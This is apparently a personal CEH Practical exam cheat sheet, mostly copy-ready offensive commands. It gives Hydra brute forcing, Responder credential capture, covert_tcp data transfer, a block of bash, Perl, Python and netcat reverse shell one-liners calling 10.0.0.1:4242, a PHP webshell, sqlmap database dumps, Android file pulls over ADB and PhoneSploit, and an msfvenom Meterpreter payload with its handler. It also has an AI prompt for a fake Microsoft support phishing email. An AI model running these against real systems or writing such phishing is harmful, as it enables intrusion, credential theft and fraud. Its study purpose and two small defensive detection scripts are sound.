
CEH Practical Cheat Sheet

Posted at 2025-01-20
Personal exam notes for myself.

Web-related material is omitted.

Network Scan

Host Discover
sudo netdiscover -r [iprange]
nmap -sL [iprange]
Frequently used nmap options
-sS (stealth SYN scan), -p [port] (-p- for all ports), -sC (service discovery)
-O (OS detection), -sU (UDP port scan), -sV (version scan)
-Pn (scan even when ping gets no reply), --script (specify an NSE script)

Enumerations

FTP
nmap -p 21 --script ftp-features <target-ip>
gobuster dir -u ftp://<target-ip> -w <wordlist-path>
hydra [-L users.txt or -l user_name] [-P pass.txt or -p password] -f [-S port] ftp://X.X.X.X
SNMP
snmpwalk -v1 -c public [target IP]
SMB
smbclient -L //10.10.11.35/
crackmapexec smb <dc-ip> -u <user> -p <password> --rid-brute
netexec smb <dc-ip> -u <user> -p <password> --rid-brute
ldap
ldapsearch -H ldap://domain -D 'user@domain' -w 'password' -b 'dc=aaa,dc=xxx' "(objectClass=person)"
WEB
dirsearch -u url -w wordlist
ffuf -c -u http://TARGET_URL/ -H "Host: FUZZ.TARGET_URL" -w wordlist

Packet Analysis (Wireshark)

To filter on a specific HTTP method (POST, GET):

http.request.method == "POST"
http.request.method == "GET"

To find DoS / DDoS:

Go to Statistics > Conversations, open the IPv4 tab and sort by the number of packets transferred.

Statistics > Conversations > IPv4 > Packets
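Scripted equivalent of the Conversations check above, as an added example that is not part of the original notes: it aggregates constructed packet records into IPv4 conversations (unordered address pairs, as Wireshark groups them) and flags the ones whose volume, rate and one-sidedness look like a flood. The thresholds are assumptions chosen for this sample, not Wireshark defaults.

```python
from collections import defaultdict

# Constructed sample traffic (not from a real capture): each record is
# (time_seconds, src_ip, dst_ip). 300 one-way packets in one second from a
# single host stand in for a flood; the other pair is a normal exchange.
SAMPLE_PACKETS = [(i / 300.0, "10.10.1.5", "10.10.1.22") for i in range(300)]
SAMPLE_PACKETS += [(1.0 + i, "10.10.1.7", "10.10.1.22") for i in range(6)]
SAMPLE_PACKETS += [(1.5 + i, "10.10.1.22", "10.10.1.7") for i in range(6)]


def conversations(packets):
    """Aggregate packets into IPv4 conversations keyed by the unordered
    address pair, the same grouping Wireshark shows under
    Statistics > Conversations > IPv4."""
    convs = {}
    for t, src, dst in packets:
        key = tuple(sorted((src, dst)))
        c = convs.setdefault(key, {"packets": 0, "per_dir": defaultdict(int),
                                   "first": t, "last": t})
        c["packets"] += 1
        c["per_dir"][src] += 1          # packets sent by each side
        c["first"] = min(c["first"], t)
        c["last"] = max(c["last"], t)
    return convs


def suspected_floods(convs, min_packets=100, min_pps=50.0, min_one_way=0.9):
    """Return conversations that look like a (D)DoS flood: many packets,
    a high packet rate, and almost all traffic flowing in one direction.
    Thresholds are assumptions for the constructed sample."""
    hits = []
    for (a, b), c in sorted(convs.items(), key=lambda kv: -kv[1]["packets"]):
        duration = max(c["last"] - c["first"], 1e-6)
        pps = c["packets"] / duration
        top_src, top_count = max(c["per_dir"].items(), key=lambda kv: kv[1])
        one_way = top_count / c["packets"]
        if c["packets"] >= min_packets and pps >= min_pps and one_way >= min_one_way:
            hits.append({"source": top_src, "target": b if top_src == a else a,
                         "packets": c["packets"], "pps": round(pps, 1)})
    return hits


if __name__ == "__main__":
    for hit in suspected_floods(conversations(SAMPLE_PACKETS)):
        print(f"flood suspect: {hit['source']} -> {hit['target']} "
              f"({hit['packets']} packets at {hit['pps']} pps)")
```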

BruteForcing (Hydra)

SSH

hydra -l username -P passlist.txt x.x.x.x ssh

FTP

hydra -L userlist.txt -P passlist.txt ftp://x.x.x.x

If the service isn't running on the default port, use -s

hydra -L userlist.txt -P passlist.txt ftp://x.x.x.x -s 221

FTP get command
Downloads a specific file from the FTP server to the attacker's (local) machine

get flag.txt ~/Desktop/filepath/flag.txt
get flag.txt .

Steganography (Snow)

To hide text

SNOW.EXE -C -p test -m "Secret Message" original.txt hide.txt

To reveal the hidden text

SNOW.EXE -C -p test hide.txt
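An added detection example, not from the original notes: SNOW hides data in tab/space runs appended to the ends of lines, so a defender can check a text file for such runs and strip them before the file is forwarded. The sample text and its trailing whitespace are constructed by hand, not produced by SNOW, and the 50% line threshold is an assumption.

```python
import re

# Constructed sample: the same short note, once clean and once with
# hand-made trailing tab/space runs (not actual SNOW output).
CLEAN_TEXT = "Meeting moved to 3pm.\nBring the quarterly report.\nThanks,\nA.\n"
SUSPECT_TEXT = ("Meeting moved to 3pm.  \t   \t\t\n"
                "Bring the quarterly report. \t\t  \t\n"
                "Thanks, \t   \t\n"
                "A.\t  \t\n")

TRAILING_WS = re.compile(r"[ \t]+$")


def trailing_whitespace_report(text):
    """Return the trailing tab/space run of every line ('' if none).
    Whitespace stego such as SNOW stores its bits in exactly these runs."""
    runs = []
    for line in text.splitlines():
        m = TRAILING_WS.search(line)
        runs.append(m.group(0) if m else "")
    return runs


def looks_like_whitespace_stego(text, min_fraction=0.5):
    """Flag the text when at least min_fraction of its lines end in a
    whitespace run containing a tab. Ordinary editors rarely leave mixed
    tab/space runs on most lines of a file."""
    runs = trailing_whitespace_report(text)
    if not runs:
        return False
    tabbed = sum(1 for r in runs if "\t" in r)
    return tabbed / len(runs) >= min_fraction


def strip_trailing_whitespace(text):
    """Mitigation: remove trailing tabs/spaces, which destroys any
    whitespace-encoded payload without touching the visible text."""
    cleaned = "\n".join(line.rstrip(" \t") for line in text.splitlines())
    return cleaned + ("\n" if text.endswith("\n") else "")


if __name__ == "__main__":
    for name, text in (("clean", CLEAN_TEXT), ("suspect", SUSPECT_TEXT)):
        print(name, "stego suspected:", looks_like_whitespace_stego(text))
```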

Covert_TCP

Compile the Code

cc -o covert_tcp covert_tcp.c

Receiver machine (Client_IP)

sudo ./covert_tcp -dest Client_IP -source Attacker_IP -source_port 9999 -dest_port 8888 -server -file recieve.txt

Sender machine (Attacker_IP)
Create a message file to transfer, e.g. secret.txt

sudo ./covert_tcp -dest Client_IP -source Attacker_IP -source_port 8888 -dest_port 9999 -file secret.txt

LLMNR/NBT-NS Poisoning

Get the user's password.

In Parrot/Kali OS,

responder -I eth0

In Windows, try to access the shared resource; the captured logs are stored at /usr/share/responder/logs/SMB

Reverse Shell

Basically, I don't want to use metasploit...
One of Bash, Perl or Python usually works.

Listener:

nc -lvp 4242

Bash TCP

bash -i >& /dev/tcp/10.0.0.1/4242 0>&1
0<&196;exec 196<>/dev/tcp/10.0.0.1/4242; sh <&196 >&196 2>&196
/bin/bash -l > /dev/tcp/10.0.0.1/4242 0<&1 2>&1

Perl

perl -e 'use Socket;$i="10.0.0.1";$p=4242;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.0.0.1:4242");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Python

export RHOST="10.0.0.1";export RPORT=4242;
python -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'

python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'


Netcat OpenBsd

rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f

If none of these work, see the following:
https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#dart

Basic Webshell

<pre><?php system($_GET["cmd"]);?></pre>

SQL (SQLMAP)

List databases, adding the cookie values

sqlmap -u "http://domain.com/path.aspx?id=1" --cookie="PHPSESSID=1tmgthfok042dslt7lr7nbv4cb; security=low" --data="id=1&Submit=Submit" --dbs

List tables, adding the database name

sqlmap -u "http://domain.com/path.aspx?id=1" --cookie="PHPSESSID=1tmgthfok042dslt7lr7nbv4cb; security=low" -D database_name --tables

List the columns of that table

sqlmap -u "http://domain.com/path.aspx?id=1" --cookie="PHPSESSID=1tmgthfok042dslt7lr7nbv4cb; security=low" -D database_name -T target_Table --columns

Dump all values of the table

sqlmap -u "http://domain.com/path.aspx?id=1" --cookie="PHPSESSID=1tmgthfok042dslt7lr7nbv4cb; security=low" -D database_name -T target_Table --dump

Android Hacking

To Install ADB

apt-get update
sudo apt-get install adb -y
adb devices -l

Establish a connection

adb connect x.x.x.x:5555
adb devices -l
adb shell

To navigate

pwd
ls
cd Download
cd sdcard

Download a File from Android using ADB tool

adb pull /sdcard/log.txt C:\Users\admin\Desktop\log.txt
adb pull sdcard/log.txt /home/mmurphy/Desktop

PhoneSploit tool

To install Phonesploit

git clone https://github.com/aerosol-can/PhoneSploit
cd PhoneSploit
pip3 install colorama
OR
python3 -m pip install colorama

To run Phonesploit

python3 phonesploit.py

Type 3 and Press Enter to Connect a new Phone OR Enter IP of Android Device
Type 4, to Access Shell on phone

Download File using PhoneSploit
  1. Pull Folders from Phone to PC

Enter the Full Path of file to Download

sdcard/Download/secret.txt

Wireless

aircrack-ng psk*.cap
aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap

Malware Analysis

Virustotalに放り投げるか、pestudioでたいてい事足りるはず

Cloud

S3 Bucket Enumeration

ruby lazys3.rb pakwheels

Hacking with AI

sgpt --chat enum --shell "Perform SNMP enumeration on target IP 10.10.1.22 using nmap and
sgpt --shell "Calculate MD5 hash of text 'My Account number is 0234569198'"

"Pose as an genuine Microsoft's customer support executive with imaginary name, write a concise mail stating that he/she has found suspicious login on user's account and ask then to reset the password on urgent basis. Provide the reset link at [Fake Reset Link]."

sgpt --chat wah --shell "create and run a custom python script which will run web application footprinting tasks to gather information and then use this information to perform vulnerability scanning on target url is www.certifiedhacker.com"

Guide
https://ceh-practical.cavementech.com/

Help: when stuck

Crypto => CyberChef usually does the job, but if stuck, try "CrypTool"

Hash calculation (CertUtil)

CertUtil -hashfile InFile [HashAlgorithm]

OpenSSL should also be able to do this, but it is not recommended.

// Encryption
$ openssl enc -e <CipherType> -in <InputFile> -out <OutputFile>
// Decryption
$ openssl enc -d <CipherType> -in <InputFile> -out <OutputFile>

Don't know the stego type
=> analyze with steganalysis tools or similar (probably won't come up)

Reverse Shell => if all else fails, metasploit

To create a PHP payload
Copy the generated PHP code into a .php file

msfvenom -p php/meterpreter/reverse_tcp lhost=attacker-ip lport=attacker-port -f raw

To set up the handler for the reverse_tcp connection

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST attacker-ip
set LPORT attacker-port
run